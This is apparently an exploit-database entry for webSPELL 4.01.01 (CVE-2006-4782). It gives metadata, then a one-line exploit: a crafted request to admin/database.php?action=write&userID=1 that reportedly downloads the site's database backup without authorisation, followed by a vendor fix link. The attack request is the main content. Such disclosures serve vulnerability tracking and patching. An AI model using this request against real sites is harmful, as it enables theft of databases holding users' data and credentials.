webSPELL 4.01.01 - Database Backup Download
Author: Trex
type: webapps
platform: php
port:
date_added: 2006-09-11
date_updated:
verified: 1
codes: OSVDB-28804;CVE-2006-4782
tags:
aliases:
screenshot_url:
application_url:
# WebSPELL <= 4.01.01 Accessible Database Backup Download Exploit
# Discovered by: Trex
# Visit: www.SecuritySector.org / www.UnderGround.ag
# Exploit:
http://[SITE]/[PATH]/admin/database.php?action=write&userID=1
# Solution:
http://cms.webspell.org/index.php?site=files&file=15
# milw0rm.com [2006-09-12]